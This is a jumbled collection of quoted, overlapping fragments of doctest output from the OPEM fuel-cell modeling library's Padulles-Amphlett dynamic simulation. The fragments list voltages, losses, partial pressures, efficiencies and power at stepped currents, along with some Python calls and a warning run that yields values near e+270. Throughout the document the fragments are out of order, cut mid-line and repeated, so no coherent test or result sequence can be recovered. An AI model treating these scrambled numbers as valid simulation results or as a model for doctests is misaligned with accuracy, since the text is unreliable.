Power-Thermal : 5.495727044129421 W ########### I : 2.7 E : 6.068375501600038", "atm PO2 : 0.1904280476833403 atm Power-Thermal : 5.495727044129421 W ########### I : 2.7", "PH2 : 0.197030238516658 atm PH2O : 0.24251022540940706 atm PO2 : 0.19054704025631486 atm Power-Thermal", "atm PO2 : 0.19034078646315894 atm Power-Thermal : 8.29401625290499 W ########### I : 3.8", "atm PH2O : 0.24218164709816473 atm PO2 : 0.19039631633054707 atm Power-Thermal : 6.49540141236458 W", ": 0.43396509140262446 V PH2 : 0.19665087821306954 atm PH2O : 0.2420432983355364 atm PO2 :", "5.954436076965834 W FC Voltage : 4.253168626404167 V Loss : 0.36304537588899266 V PH2 :", "0.0012307785370829418 V FC Efficiency : 0.5755840434599239 FC Power : 3.1426888772911847 W FC Voltage", "Eta Activation : 0.417106024344736 V Eta Concentration : 0.0006569460115677318 V Eta Ohmic :", "Voltage : 4.05024559387154 V Loss : 0.4036265972020676 V PH2 : 0.19683353317405658 atm PH2O", "0.35009414904739194 V Eta Concentration : 0.00023552453535116493 V Eta Ohmic : 0.002113348284589288 V FC", ": 0.3232442167420945 V Eta Concentration : 0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461 V", "########### I : 0.5 E : 6.068409348602667 V Eta Activation : 0.2921240370409447 V", "FC Power : 3.96394836982324 W FC Voltage : 4.404387077581378 V Loss : 0.3328032238653337", "Loss : 0.4299811339950573 V PH2 : 0.1966789789762983 atm PH2O : 0.2420778855261935 atm PO2", "10.12561398467885 W FC Voltage : 4.05024559387154 V Loss : 0.4036265972020676 V PH2 :", ": 0.42791409484462756 V PH2 : 0.1966930293579127 atm PH2O : 0.24209517912152204 atm PO2 :", "Efficiency : 0.5093595307581349 FC Power : 12.316313453731704 W FC Voltage : 3.9730043399134525 V", "6.068398582464819 V Eta Activation : 0.35009414904739194 V Eta Concentration : 0.00023552453535116493 V Eta", "Eta Concentration : 0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046 V FC Efficiency :", "V Eta Activation : 0.3960054536369255 V Eta Concentration : 0.00047486339861378836 V Eta Ohmic", "V Eta Concentration : 0.0006569460115677318 V Eta Ohmic : 0.005852080755831333 V FC Efficiency", "N=None) [Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True)", ": 6.748686546268298 W ########### I : 3.2 E : 6.068367804773196 V Eta Activation", ": 0.1967632812659846 atm PH2O : 0.24218164709816473 atm PO2 : 0.19039631633054707 atm Power-Thermal :", "PH2O : 0.2421643535028362 atm PO2 : 0.1903883834923488 atm Power-Thermal : 6.748686546268298 W ###########", "W FC Voltage : 3.9730043399134525 V Loss : 0.4190730008706778 V PH2 : 0.19674923088437024", "PO2 : 0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W ########### I : 1.9 E", "W FC Voltage : 3.997095288345469 V Loss : 0.4142554269432475 V PH2 : 0.196777331647599", "W FC Voltage : -2.3185876665375803e+270 V Loss : 4.63717533307516e+269 V PH2 : 0.19717074233280188", "FC Efficiency : 0.5140663396997094 FC Power : 11.227208859041653 W FC Voltage : 4.0097174496577335", "5.249386015321152 W ########### I : 2.6 E : 6.068377040773017 V Eta Activation :", "Ohmic : 0.0037092867838082735 V FC Efficiency : 0.5271753860695316 FC Power : 8.635132823818928 W", "Ohmic : 0.005852080755831333 V FC Efficiency : 0.5064475653403494 FC Power : 13.035960331860592 W", "V Eta Concentration : 0.000494984370825149 V Eta Ohmic : 0.00442164533169592 V FC Efficiency", "Loss : 0.4142554269432475 V PH2 : 0.196777331647599 atm PH2O : 0.24219894069349326 atm PO2", ": 3.888920778866117 V Loss : 0.4358872495310143 V PH2 : 0.19663682783145514 atm PH2O :", ": 6.068413961701556 V Eta Activation : 0.23146009851376736 V Eta Concentration : 3.899435456560147e-05 V", "0.00657019196303564 V FC Efficiency : 0.50107358791043 FC Power : 14.460983747095012 W FC Voltage", "V Eta Ohmic : 0.0037092867838082735 V FC Efficiency : 0.5271753860695316 FC Power :", ": 0.1967913820292134 atm PH2O : 0.2422162342888218 atm PO2 : 0.19041218200694368 atm Power-Thermal :", "FC Efficiency : 0.507882865258588 FC Power : 12.676756316854359 W FC Voltage : 3.9614863490169867", "W ########### I : 0.6 E : 6.0684078107750326 V Eta Activation : 0.3041956781419353", "V FC Efficiency : 0.507882865258588 FC Power : 12.676756316854359 W FC Voltage :", "TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . . . I : 0.1 E", "PO2 : 0.19034871930135727 atm Power-Thermal : 8.033558485745605 W ########### I : 3.7 E", "6.068360106342617 V Eta Activation : 0.4246884348310017 V Eta Concentration : 0.0007385973342150736 V Eta", ": 0.0003547094700620668 V Eta Ohmic : 0.003176255519565377 V FC Efficiency : 0.5341016324451575 FC", "... Warning : The value of I(>0.1) leads to minus amount of V,", "atm PH2O : 0.2425966933860498 atm PO2 : 0.1905867044473064 atm Power-Thermal : 0.9650580567185031 W", "atm PO2 : 0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W ########### I : 1.9", "6.068375501600038 V Eta Activation : 0.4038089891176398 V Eta Concentration : 0.0005353086845364485 V Eta", "6.068361646157063 V Eta Activation : 0.4228725100457559 V Eta Concentration : 0.0007181421727400468 V Eta", ": 0.2425966933860498 atm PO2 : 0.1905867044473064 atm Power-Thermal : 0.9650580567185031 W ########### I", "Concentration : 0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735 V FC Efficiency : 0.5271753860695316", "FC Power : 6.731161282259518 W FC Voltage : 4.206975801412199 V Loss : 0.37228332551300575", "0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716 V FC Efficiency : 0.5250728373249665 FC Power", "0.006390481776561363 V FC Efficiency : 0.5023661507925354 FC Power : 14.106441514254398 W FC Voltage", "Concentration : 0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497 V FC Efficiency : 0.5366552535984287", "0.0007181421727400468 V Eta Ohmic : 0.006390481776561363 V FC Efficiency : 0.5023661507925354 FC Power", "4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498", "0.38052969267197334 V Eta Concentration : 0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046 V FC", ": 0.36914696409844006 V Eta Concentration : 0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026 V", "Loss : 0.397705910482824 V PH2 : 0.19686163393728537 atm PH2O : 0.24230270226546458 atm PO2", "Power : 0.9818326194558784 W FC Voltage : 4.909163097279392 V Loss : 0.23185017288443285 V", ": 0.6293798842665886 FC Power : 0.9818326194558784 W FC Voltage : 4.909163097279392 V Loss", "atm PH2O : 0.24223352788415034 atm PO2 : 0.190420114845142 atm Power-Thermal : 5.7435444057448075 W", "is generating ... Warning : The value of I(>0.1) leads to minus amount", "FC Efficiency : 0.5485505413555333 FC Power : 5.562302489345107 W FC Voltage : 4.27869422257316", "Eta Concentration : 0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418 V FC Efficiency :", "Loss : 0.4213762911512418 V PH2 : 0.19673518050275585 atm PH2O : 0.24214705990750765 atm PO2", "W FC Voltage : 4.0097174496577335 V Loss : 0.41173130254104057 V PH2 : 0.1967913820292134", ": 0.0028214871486926026 V FC Efficiency : 0.5393558719759229 FC Power : 6.731161282259518 W FC", "V Loss : 0.41670093756357396 V PH2 : 0.1967632812659846 atm PH2O : 0.24218164709816473 atm", "Power-Thermal : 9.331810347802308e+271 W ########### I : 4.0 E : 6.144553093215826 V Eta", "0.387853540075361 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012", "Activation : 0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271", ": 0.3839273955127959 V Eta Concentration : 0.00039465233709598025 V Eta Ohmic : 0.003531492225469087 V", ": 0.35009414904739194 V Eta Concentration : 0.00023552453535116493 V Eta Ohmic : 0.002113348284589288 V", "-0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9", ": 8.555574184086693 W ########### I : 3.9 E : 6.068357026521189 V Eta Activation", "5.7435444057448075 W ########### I : 2.8 E : 6.068373962362936 V Eta Activation :", "V PH2 : 0.19705833927988675 atm PH2O : 0.24254481260006414 atm PO2 : 0.19056290593271147 atm", "0.19039631633054707 atm Power-Thermal : 6.49540141236458 W ########### I : 3.1 E : 6.068369344266841", "0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215 V FC Efficiency : 0.5050511549266622 FC Power", ": 0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461 V FC Efficiency : 0.569790429225178 FC", "W FC Voltage : 4.253168626404167 V Loss : 0.36304537588899266 V PH2 : 0.19698808737181484", "########### I : 0.7 E : 6.068406272883388 V Eta Activation : 0.31440243547871893 V", "V Eta Ohmic : 0.0028214871486926026 V FC Efficiency : 0.5393558719759229 FC Power :", ": 3.1426888772911847 W FC Voltage : 4.489555538987407 V Loss : 0.3157701467791963 V PH2", ": 0.5174690806642298 FC Power : 10.494272955870581 W FC Voltage : 4.036258829180992 V Loss", "V Eta Activation : 0.4228725100457559 V Eta Concentration : 0.0007181421727400468 V Eta Ohmic", "0.24202600474020786 atm PO2 : 0.19032492078676233 atm Power-Thermal : 8.818208962422144 W ########### Report is", "Power-Thermal : 8.555574184086693 W ########### I : 3.9 E : 6.068357026521189 V Eta", "0.00017548304819292376 V FC Efficiency : 0.6589203974773784 FC Power : 0.5139579100323552 W FC Voltage", "W ########### I : 2.8 E : 6.068373962362936 V Eta Activation : 0.40621862980268425", "-2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270 V Loss :", "PH2 : 0.19681948279244216 atm PH2O : 0.2422508214794789 atm PO2 : 0.1904280476833403 atm Power-Thermal", "FC Voltage : 4.06476164297181 V Loss : 0.40072369519096346 V PH2 : 0.19684758355567097 atm", "Eta Concentration : 1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269 V FC Efficiency :", "-2.3185876665375803e+270 V Loss : 4.63717533307516e+269 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925", "V Eta Ohmic : 0.0033538152156708046 V FC Efficiency : 0.5316790944492106 FC Power :", "0.39456301313781456 V PH2 : 0.19687568431889974 atm PH2O : 0.2423199958607931 atm PO2 : 0.1904597790361335", "E : 6.068369344266841 V Eta Activation : 0.4129629601316751 V Eta Concentration : 0.0006162888970501038", "Activation : 0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269", ": 0.5211232875604884 FC Power : 9.755427943132343 W FC Voltage : 4.06476164297181 V Loss", "FC Efficiency : -5.981929710129684e+270 FC Power : -9.331810347802308e+271 W FC Voltage : -4.665905173901154e+271", "Efficiency : 0.6589203974773784 FC Power : 0.5139579100323552 W FC Voltage : 5.1395791003235525 V", "FC Power : 13.750774490894704 W FC Voltage : 3.9287927116842014 V Loss : 0.42791409484462756", "PH2O : 0.24249293181407852 atm PO2 : 0.19053910741811658 atm Power-Thermal : 2.212579832246212 W ###########", "6.068401658824337 V Eta Activation : 0.33802037026202836 V Eta Concentration : 0.0001960088652678871 V Eta", "V Eta Activation : 0.4107901672807063 V Eta Concentration : 0.0005960022064159204 V Eta Ohmic", "PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W ###########", "0.19697403699020044 atm PH2O : 0.24244105102809288 atm PO2 : 0.19051530890352164 atm Power-Thermal : 2.8809969177338575", "V Eta Concentration : 0.0005757433248249061 V Eta Ohmic : 0.005135904406545483 V FC Efficiency", "6.068384735676256 V Eta Activation : 0.38715939375662295 V Eta Concentration : 0.00041466432635066115 V Eta", "V Eta Ohmic : 0.005135904406545483 V FC Efficiency : 0.5124481138904448 FC Power :", ": 0.37228332551300575 V PH2 : 0.19695998660858605 atm PH2O : 0.24242375743276434 atm PO2 :", "I : 0.9 E : 6.068403196908046 V Eta Activation : 0.3310434726426763 V Eta", ": 0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215 V FC Efficiency : 0.5050511549266622 FC", "V Loss : 0.4358872495310143 V PH2 : 0.19663682783145514 atm PH2O : 0.24202600474020786 atm", "Power-Thermal : 5.495727044129421 W ########### I : 2.7 E : 6.068375501600038 V Eta", ": 0.42817767789163225 V Eta Concentration : 0.0007795927885366656 V Eta Ohmic : 0.006929978850845375 V", "W ########### I : 2.1 E : 6.068384735676256 V Eta Activation : 0.38715939375662295", "atm PO2 : 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W ########### I : 4.0", "PH2O : 0.24261398698137834 atm PO2 : 0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W ###########", "6.068377040773017 V Eta Activation : 0.40130847825734167 V Eta Concentration : 0.0005151327744999589 V Eta", "0.1966649285946839 atm PH2O : 0.24206059193086493 atm PO2 : 0.19034078646315894 atm Power-Thermal : 8.29401625290499", "Activation : 0.40130847825734167 V Eta Concentration : 0.0005151327744999589 V Eta Ohmic : 0.004600031286563196", "(Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing", ": 0.24233728945612165 atm PO2 : 0.19046771187433184 atm Power-Thermal : 4.279867176181073 W ########### I", ": 0.19681948279244216 atm PH2O : 0.2422508214794789 atm PO2 : 0.1904280476833403 atm Power-Thermal :", "V Eta Ohmic : 0.002644278024175193 V FC Efficiency : 0.5422224856637728 FC Power :", "FC Efficiency : 0.5023661507925354 FC Power : 14.106441514254398 W FC Voltage : 3.918455976181777", "7.774225509105296 W ########### I : 3.6 E : 6.068361646157063 V Eta Activation :", "Eta Activation : 0.35539503345654255 V Eta Concentration : 0.0002553220624997795 V Eta Ohmic :", "FC Power : 5.562302489345107 W FC Voltage : 4.27869422257316 V Loss : 0.3579405643231677", "W FC Voltage : 4.404387077581378 V Loss : 0.3328032238653337 V PH2 : 0.19705833927988675", "4.368519891182348 W FC Voltage : 4.368519891182348 V Loss : 0.3399763535283976 V PH2 :", "E : 6.068393967445208 V Eta Activation : 0.3648724409731032 V Eta Concentration : 0.0002949968562774962", "Eta Concentration : 0.0006366034731784721 V Eta Ohmic : 0.005672855976278701 V FC Efficiency :", "I : 3.6 E : 6.068361646157063 V Eta Activation : 0.4228725100457559 V Eta", "atm PO2 : 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W ########### I : 2.0", "1.3 E : 6.068397044188998 V Eta Activation : 0.35539503345654255 V Eta Concentration :", "V Eta Concentration : 3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837 V FC Efficiency", "0.9103753288368093 V Eta Concentration : 2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270 V FC", "4.335978606366966 V Loss : 0.3464843028619262 V PH2 : 0.197030238516658 atm PH2O : 0.24251022540940706", "Eta Activation : 0.33802037026202836 V Eta Concentration : 0.0001960088652678871 V Eta Ohmic :", "0.19704428889827239 atm PH2O : 0.2425275190047356 atm PO2 : 0.1905549730945132 atm Power-Thermal : 1.781480108817652", "PO2 : 0.19057877160910808 atm Power-Thermal : 1.1623111227088154 W ########### I : 0.8 E", "V Eta Activation : 0.36030304442922906 V Eta Concentration : 0.00027514614569545357 V Eta Ohmic", "FC Power : 1.4321903165847678 W FC Voltage : 4.7739677219492265 V Loss : 0.25888894042333943", "0.19049944322712503 atm Power-Thermal : 3.338951337284836 W ########### I : 1.8 E : 6.068389351849069", "########### I : 4.0 E : 6.144553093215826 V Eta Activation : 0.9106431331307118 V", "FC Efficiency : 0.6293798842665886 FC Power : 0.9818326194558784 W FC Voltage : 4.909163097279392", "FC Efficiency : 0.5366552535984287 FC Power : 7.116048662715165 W FC Voltage : 4.185910978067744", "5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488 V FC Efficiency : 0.6120471438396443 FC Power", "0.000494984370825149 V Eta Ohmic : 0.00442164533169592 V FC Efficiency : 0.5192622556245563 FC Power", "E : 6.068392428977227 V Eta Activation : 0.36914696409844006 V Eta Concentration : 0.0003148742658730733", "V Eta Activation : 0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06 V Eta Ohmic", "Voltage : 4.489555538987407 V Loss : 0.3157701467791963 V PH2 : 0.19708644004311557 atm PH2O", "shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . .", ": 0.8 E : 6.068404734927729 V Eta Activation : 0.3232442167420945 V Eta Concentration", "0.37228332551300575 V PH2 : 0.19695998660858605 atm PH2O : 0.24242375743276434 atm PO2 : 0.19050737606532336", "V PH2 : 0.19665087821306954 atm PH2O : 0.2420432983355364 atm PO2 : 0.19033285362496066 atm", "0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W ########### I : 4.0 E : 6.144553093215826", ": 1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm PH2O : 0.24200871114487932 atm PO2 :", "Eta Concentration : 0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461 V FC Efficiency :", ": 0.19683353317405658 atm PH2O : 0.24226811507480747 atm PO2 : 0.19043598052153862 atm Power-Thermal :", "V FC Efficiency : 0.6293798842665886 FC Power : 0.9818326194558784 W FC Voltage :", ": 1.9 E : 6.068387813188879 V Eta Activation : 0.38052969267197334 V Eta Concentration", "V FC Efficiency : 0.5293741761651032 FC Power : 8.25823714817561 W FC Voltage :", "FC Efficiency : 0.5108802815228812 FC Power : 11.95459858763542 W FC Voltage : 3.9848661958784737", "W ########### I : 1.6 E : 6.068392428977227 V Eta Activation : 0.36914696409844006", "I : 1.6 E : 6.068392428977227 V Eta Activation : 0.36914696409844006 V Eta", ": 1.5 E : 6.068393967445208 V Eta Activation : 0.3648724409731032 V Eta Concentration", "6.068387813188879 V Eta Activation : 0.38052969267197334 V Eta Concentration : 0.0003746674093630815 V Eta", ": 4.306183473128157 V Loss : 0.3524430218673324 V PH2 : 0.1970161881350436 atm PH2O :", "E : 6.068383196823811 V Eta Activation : 0.39024111055794025 V Eta Concentration : 0.0004347034505143372", "Activation : 0.3960054536369255 V Eta Concentration : 0.00047486339861378836 V Eta Ohmic : 0.004243378155424144", "W FC Voltage : 4.60290798706484 V Loss : 0.2931002723075654 V PH2 : 0.19711454080634436", "0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026 V FC Efficiency : 0.5393558719759229 FC Power", "PO2 : 0.19043598052153862 atm Power-Thermal : 5.249386015321152 W ########### I : 2.6 E", "Power-Thermal : 2.212579832246212 W ########### I : 1.3 E : 6.068397044188998 V Eta", "FC Power : 12.676756316854359 W FC Voltage : 3.9614863490169867 V Loss : 0.4213762911512418", "atm PH2O : 0.24233728945612165 atm PO2 : 0.19046771187433184 atm Power-Thermal : 4.279867176181073 W", "PO2 : 0.19034078646315894 atm Power-Thermal : 8.29401625290499 W ########### I : 3.8 E", ": 9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419 V FC Efficiency : 0.5901164085980564 FC", "14.814425815913308 W FC Voltage : 3.8985331094508706 V Loss : 0.43396509140262446 V PH2 :", "PO2 : 0.1904042491687454 atm Power-Thermal : 6.24342366379814 W ########### I : 3.0 E", "########### Report is generating ... Warning : The value of I(>0.1) leads to", "''' >>> from opem.Dynamic.Padulles_Amphlett import * >>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector,", ": 0.49857958703411753 FC Power : 15.166791037577857 W FC Voltage : 3.888920778866117 V Loss", "Eta Activation : 0.41506683170178466 V Eta Concentration : 0.0006366034731784721 V Eta Ohmic :", "V Loss : 0.3157701467791963 V PH2 : 0.19708644004311557 atm PH2O : 0.24257939979072127 atm", "V Eta Concentration : 0.00045476978327314626 V Eta Ohmic : 0.004065229504538212 V FC Efficiency", "Concentration : 0.0005757433248249061 V Eta Ohmic : 0.005135904406545483 V FC Efficiency : 0.5124481138904448", ": 0.19034078646315894 atm Power-Thermal : 8.29401625290499 W ########### I : 3.8 E :", "V PH2 : 0.19662277744984075 atm PH2O : 0.24200871114487932 atm PO2 : 0.19031698794856405 atm", ": 0.24245834462342142 atm PO2 : 0.19052324174171997 atm Power-Thermal : 2.6555639230341663 W ########### I", "0.24237187664677873 atm PO2 : 0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W ########### I :", ": 4.05024559387154 V Loss : 0.4036265972020676 V PH2 : 0.19683353317405658 atm PH2O :", "10.861455594255196 W FC Voltage : 4.022761331205627 V Loss : 0.40912283407888206 V PH2 :", "V Loss : 0.4142554269432475 V PH2 : 0.196777331647599 atm PH2O : 0.24219894069349326 atm", "0.19033285362496066 atm Power-Thermal : 8.555574184086693 W ########### I : 3.9 E : 6.068357026521189", "Power : 4.769576467003663 W FC Voltage : 4.335978606366966 V Loss : 0.3464843028619262 V", ": 0.9103753288368093 V Eta Concentration : 2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270 V", "0.197030238516658 atm PH2O : 0.24251022540940706 atm PO2 : 0.19054704025631486 atm Power-Thermal : 1.9954235329963377", "Voltage : 4.229335388177429 V Loss : 0.3678117158535559 V PH2 : 0.19697403699020044 atm PH2O", "I : 2.2 E : 6.068383196823811 V Eta Activation : 0.39024111055794025 V Eta", "Power : 13.393956628655083 W FC Voltage : 3.9393990084279658 V Loss : 0.4257931434330969 V", "0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497 V FC Efficiency : 0.5366552535984287 FC Power", "V Eta Activation : 0.4190844003836543 V Eta Concentration : 0.0006773165893020328 V Eta Ohmic", "5.992791140958347 W ########### I : 2.9 E : 6.068372423061707 V Eta Activation :", "4.769576467003663 W FC Voltage : 4.335978606366966 V Loss : 0.3464843028619262 V PH2 :", "3.9848661958784737 V Loss : 0.41670093756357396 V PH2 : 0.1967632812659846 atm PH2O : 0.24218164709816473", ": 0.19039631633054707 atm Power-Thermal : 6.49540141236458 W ########### I : 3.1 E :", "-3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V PH2 :", "V Eta Concentration : 0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461 V FC Efficiency", "0.19686163393728537 atm PH2O : 0.24230270226546458 atm PO2 : 0.19045184619793523 atm Power-Thermal : 4.761340157365757", "0.35539503345654255 V Eta Concentration : 0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615 V FC", ": 0.19041218200694368 atm Power-Thermal : 5.992791140958347 W ########### I : 2.9 E :", "FC Efficiency : 0.5174690806642298 FC Power : 10.494272955870581 W FC Voltage : 4.036258829180992", ": 0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W ########### I : 0.9 E :", ": 0.1971566919511875 atm PH2O : 0.24266586776736396 atm PO2 : 0.1906184358000996 atm Power-Thermal :", "0.5822525519832258 FC Power : 2.724941943281497 W FC Voltage : 4.541569905469162 V Loss :", "E : 6.068378579881878 V Eta Activation : 0.39870996749954657 V Eta Concentration : 0.000494984370825149", "PO2 : 0.1906105029619013 atm Power-Thermal : 0.41280968341523216 W ########### I : 0.4 E", ": 0.005135904406545483 V FC Efficiency : 0.5124481138904448 FC Power : 11.591576336201861 W FC", ": 6.0683862744646095 V Eta Activation : 0.3839273955127959 V Eta Concentration : 0.00039465233709598025 V", "6.068410886366294 V Eta Activation : 0.27735002084480426 V Eta Concentration : 7.809186891953766e-05 V Eta", "0.0008785557847524419 V FC Efficiency : 0.5901164085980564 FC Power : 2.30145399353242 W FC Voltage", "0.5036913732928463 FC Power : 13.750774490894704 W FC Voltage : 3.9287927116842014 V Loss :", "0.9650580567185031 W ########### I : 0.7 E : 6.068406272883388 V Eta Activation :", "Ohmic : 0.00657019196303564 V FC Efficiency : 0.50107358791043 FC Power : 14.460983747095012 W", "1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm PH2O : 0.24200871114487932 atm PO2 : 0.19031698794856405", "I : 1.1 E : 6.068400120676597 V Eta Activation : 0.3443319458183834 V Eta", "Efficiency : 0.5901164085980564 FC Power : 2.30145399353242 W FC Voltage : 4.60290798706484 V", "V PH2 : 0.19672113012114145 atm PH2O : 0.2421297663121791 atm PO2 : 0.19037251781595219 atm", ": 0.5023661507925354 FC Power : 14.106441514254398 W FC Voltage : 3.918455976181777 V Loss", ": 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W ########### I", "Power : 14.814425815913308 W FC Voltage : 3.8985331094508706 V Loss : 0.43396509140262446 V", "Activation : 0.4190844003836543 V Eta Concentration : 0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215", "3.96394836982324 W FC Voltage : 4.404387077581378 V Loss : 0.3328032238653337 V PH2 :", ": 0.0007026162388380664 V FC Efficiency : 0.5997124668722417 FC Power : 1.8711028966413943 W FC", ": 1.3 E : 6.068397044188998 V Eta Activation : 0.35539503345654255 V Eta Concentration", ": 6.068384735676256 V Eta Activation : 0.38715939375662295 V Eta Concentration : 0.00041466432635066115 V", "V Eta Concentration : 4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271 V FC Efficiency", "Ohmic : 0.006750024222922298 V FC Efficiency : 0.49981193710908595 FC Power : 14.814425815913308 W", "0.2425275190047356 atm PO2 : 0.1905549730945132 atm Power-Thermal : 1.781480108817652 W ########### I :", "PH2 : 0.19698808737181484 atm PH2O : 0.24245834462342142 atm PO2 : 0.19052324174171997 atm Power-Thermal", "Concentration : 0.0005353086845364485 V Eta Ohmic : 0.004778536276705824 V FC Efficiency : 0.5157386322058496", ": 0.4107901672807063 V Eta Concentration : 0.0005960022064159204 V Eta Ohmic : 0.005314768076451755 V", ": 0.569790429225178 FC Power : 3.555492278365111 W FC Voltage : 4.4443653479563885 V Loss", ": 3.338951337284836 W ########### I : 1.8 E : 6.068389351849069 V Eta Activation", "Eta Activation : 0.3232442167420945 V Eta Concentration : 0.00015659857042988755 V Eta Ohmic :", "Activation : 0.4129629601316751 V Eta Concentration : 0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275", "V Eta Activation : 0.27735002084480426 V Eta Concentration : 7.809186891953766e-05 V Eta Ohmic", "I : 0.3 E : 6.068412424065923 V Eta Activation : 0.2583036192079603 V Eta", "-9.331810347802308e+271 W FC Voltage : -4.665905173901154e+271 V Loss : 9.331810347802308e+270 V PH2 :", "I : 3.3 E : 6.0683662652154 V Eta Activation : 0.417106024344736 V Eta", "Efficiency : 0.55589469312397 FC Power : 4.769576467003663 W FC Voltage : 4.335978606366966 V", ": 0.19043598052153862 atm Power-Thermal : 5.249386015321152 W ########### I : 2.6 E :", "V FC Efficiency : 0.5452780290261753 FC Power : 5.954436076965834 W FC Voltage :", "0.39024111055794025 V Eta Concentration : 0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716 V FC", "Eta Concentration : 0.0005757433248249061 V Eta Ohmic : 0.005135904406545483 V FC Efficiency :", "I : 3.4 E : 6.06836472559345 V Eta Activation : 0.4190844003836543 V Eta", "Eta Concentration : 9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419 V FC Efficiency :", "4.306183473128157 V Loss : 0.3524430218673324 V PH2 : 0.1970161881350436 atm PH2O : 0.24249293181407852", "########### Padulles-Amphlett-Model Simulation ########### Analyzing . . . I : 0.1 E :", "Eta Ohmic : 0.0003510800160998837 V FC Efficiency : 0.6293798842665886 FC Power : 0.9818326194558784", ": 0.4257931434330969 V PH2 : 